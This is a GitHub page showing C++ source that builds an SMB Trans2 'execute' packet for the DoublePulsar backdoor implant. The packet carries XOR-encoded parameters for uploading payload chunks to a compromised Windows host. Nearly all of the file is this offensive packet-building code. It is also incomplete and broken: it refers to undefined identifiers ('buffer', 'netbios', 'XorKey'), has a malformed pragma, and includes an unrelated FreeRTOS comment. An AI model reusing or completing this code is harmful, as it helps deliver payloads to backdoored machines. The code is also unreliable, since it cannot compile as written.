-
Notifications
You must be signed in to change notification settings - Fork 136
Expand file tree
/
Copy pathDoublepulsar_GeneratePacketStruct.cpp
More file actions
261 lines (222 loc) · 7.18 KB
/
Doublepulsar_GeneratePacketStruct.cpp
File metadata and controls
261 lines (222 loc) · 7.18 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
/*
The purpose is to generate a Doublepulsar execute SMB packet and fill in all the applicable values
so a proper request can be sent and executed on the Doublepulsar implant
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"wsock32.lib")
typedef unsigned short ushort;
typedef unsigned char uchar;
/*
However, the TCP/IP protocol headers do not have padding bytes, so the compiler must be instructed not to add them additional bytes into structures
that map onto the IP protocol headers that a written to or read from Ethernet frames.
Structures that do not contain padding bytes are said to be 'packed'.
The syntax required to ensure structures are packed depends on the embedded C compiler.
The FreeRTOS+TCP implementation cannot use any C compiler specific syntax in the common (not MCU port specific) files,
and instead allows users to define their own packing directives in two very simple header files that are then included from the C files.
*/
/* Sources used:
https://www.rapid7.com/blog/post/2019/10/02/open-source-command-and-control-of-the-doublepulsar-implant/
https://shasaurabh.blogspot.com/2017/05/doublepulsar-backdoor.html
https://www.geeksforgeeks.org/structure-member-alignment-padding-and-data-packing/
*/
#pragma pack(1)
//struct __attribute__((__packed__)) net_bios
typedef struct
{
uint16_t type; //added by me; remove if there is a problem
uint32_t length;
} net_bios;
//struct __attribute__((__packed__)) smb_header
typedef struct
{
unsigned char protocol[4];
unsigned char command;
uint32_t NTSTATUS;
unsigned char flag;
ushort flag2;
ushort PIDHigh;
unsigned char SecuritySignature[8];
/*
from Microsoft documentation: UCHAR SecurityFeatures[8];
unsigned char securityFeature[8]; OR BYTE SecuritySignature[8];
*/
ushort reserves;
ushort tid;
ushort pid;
ushort uid;
ushort mid;
} smb_header;
//struct __attribute__((__packed__)) Trans_Response
typedef struct
{
unsigned char wordCount;
ushort totalParameterCount;
ushort totalDataCount;
ushort maxParameterCount;
ushort maxDataCount;
unsigned char maxSetupCount;
unsigned char reserved;
ushort flags;
uint32_t timeout;
ushort reserved2;
ushort parameterCount;
ushort parameterOffset;
ushort dataCount;
ushort dataOffset;
unsigned char setupCount;
unsigned char reserved3;
ushort subcommand;
ushort byteCount;
//ushort padding; //creates 2 bytes, while the packet only needs 1
unsigned char padding; //creates 1 byte. do NOT use ushort for this padding
} Trans_Response;
//Size of params: 12
/*
typedef struct
{
ULONG DataSize;
ULONG chunksize;
ULONG offset;
} smb_parameters;
*/
//typedef struct __attribute__((__packed__))
typedef struct
{
unsigned char parameters[12];
} smb_parameters;
typedef struct
{
unsigned char smbdata[4096];
} smb_data;
#pragma pop
/*
# SMB_Parameters
{
UCHAR WordCount;
USHORT Words[WordCount] (variable);
}
# SMB_Data
{
USHORT ByteCount;
UCHAR Bytes[ByteCount] (variable);
}
*/
void hexDump(char* desc, void* addr, int len)
{
int i;
unsigned char buff[17];
unsigned char* pc = (unsigned char*)addr;
// Output description if given.
if (desc != NULL)
printf("%s:\n", desc);
// Process every byte in the data.
for (i = 0; i < len; i++) {
// Multiple of 16 means new line (with line offset).
if ((i % 16) == 0) {
// Just don't print ASCII for the zeroth line.
if (i != 0)
printf(" %s\n", buff);
// Output the offset.
printf(" %04x ", i);
}
// Now the hex code for the specific character.
printf(" %02x", pc[i]);
// And store a printable ASCII character for later.
if ((pc[i] < 0x20) || (pc[i] > 0x7e)) {
buff[i % 16] = '.';
}
else {
buff[i % 16] = pc[i];
}
buff[(i % 16) + 1] = '\0';
}
// Pad out last line if not exactly 16 characters.
while ((i % 16) != 0) {
printf(" ");
i++;
}
// And print the final ASCII bit.
printf(" %s\n", buff);
}
void generate_SMB_packet()
{
//alloc some memory here
unsigned char send_buffer[4179];
net_bios *nb = (net_bios*)send_buffer;
smb_header* smb = (smb_header*)(send_buffer + sizeof(net_bios));
Trans_Response *trans2 = (Trans_Response*)(send_buffer + sizeof(net_bios) + sizeof(smb_header));
nb->type = 0x00;
nb->length = htons(4174); //NetBIOS size = totalPacketSize - 4 ( NetBIOS header is not counted )
//Size of smb_header + size of Trans2_Response header + parameter size + SMB_Data are counted in the packet size
//nb->length = htons(4174);
/*
uint16_t htons_len = htons(4174);
memcpy(buffer+2, &htons_len, 2);
hexDump(0,buffer,10);
*/
smb->protocol[0] = '\xff';
smb->protocol[1] = 'S';
smb->protocol[2] = 'M';
smb->protocol[3] = 'B';
smb->command = 0x32;
smb->NTSTATUS = 0x00000000;
smb->flag = 0x18;
smb->flag2 = 0xc007;
smb->PIDHigh = 0x0000;
smb->SecuritySignature[0] = 0;
smb->SecuritySignature[1] = 0;
smb->SecuritySignature[2] = 0;
smb->SecuritySignature[3] = 0;
smb->SecuritySignature[4] = 0;
smb->SecuritySignature[5] = 0;
smb->SecuritySignature[6] = 0;
smb->SecuritySignature[7] = 0;
smb->reserves = 0x0000;
smb->pid = 0xfeff;
smb->tid = 2048;
smb->uid = 2048;
smb->mid = 66;
trans2->wordCount = 15;
trans2->totalParameterCount = 12;
trans2->totalDataCount = 4096;
trans2->maxParameterCount = 1;
trans2->maxDataCount = 0;
trans2->maxSetupCount = 0;
trans2->reserved = 0;
trans2->flags = 0x0000;
trans2->timeout = 0x001a8925;
trans2->reserved2 = 0x0000;
trans2->parameterCount = 12;
trans2->parameterOffset = 66; // make this dynamic -> calc based off sizeof(smb_header) + sizeof(Trans_Response) < PARAMS ARE HERE >
trans2->dataCount = 4096;
trans2->dataOffset = 78; // make this dynamic -> calc based off sizeof(smb_header) + sizeof(Trans_Response) + sizeof(smb_parameters) < SMB DATA IS HERE >
trans2->setupCount = 1;
trans2->reserved3 = 0x00;
trans2->subcommand = 0x000e;
trans2->byteCount = 4109; //make this dynamic -> calc based off sizeof(params)+sizeof(SMB_DATA)
trans2->padding = 0x00;
printf("Offset of Parameters: %d\n", sizeof(smb_header) + sizeof(Trans_Response));
printf("Offset of Data: %d\n", sizeof(smb_header) + sizeof(Trans_Response) + sizeof(smb_parameters));
int param_offset_len = sizeof(smb_header) + sizeof(Trans_Response);
int dataOffset_len = sizeof(smb_header) + sizeof(Trans_Response) + sizeof(smb_parameters);
trans2->parameterOffset = param_offset_len;
trans2->dataOffset = dataOffset_len;
smb_parameters *smb_params = (smb_parameters*)(buffer + sizeof(netbios) + sizeof(smb_header) + sizeof(Trans_Response));
//make DataSize dynamic where it calculates the size of the buffer of the payload / shellcode
//In this case, this is static but will change to be dynamic in the future.
unsigned long DataSize = 0x507308 ^ XorKey;
//size of the chunk of the payload being sent. all but last packet are 4096
unsigned long chunksize = 4096 ^ XorKey;
//offset begins at 0 and increments based on the previous packets sent
unsigned long offset = 0 ^ XorKey;
memcpy(smb_params->parameters, (unsigned char*)&DataSize, 4);
memcpy(smb_params->parameters + 4, (unsigned char*)&chunksize, 4);
memcpy(smb_params->parameters +8 , (unsigned char*)&offset, 4);
hexDump(0, send_buffer, 4178);
getchar();
}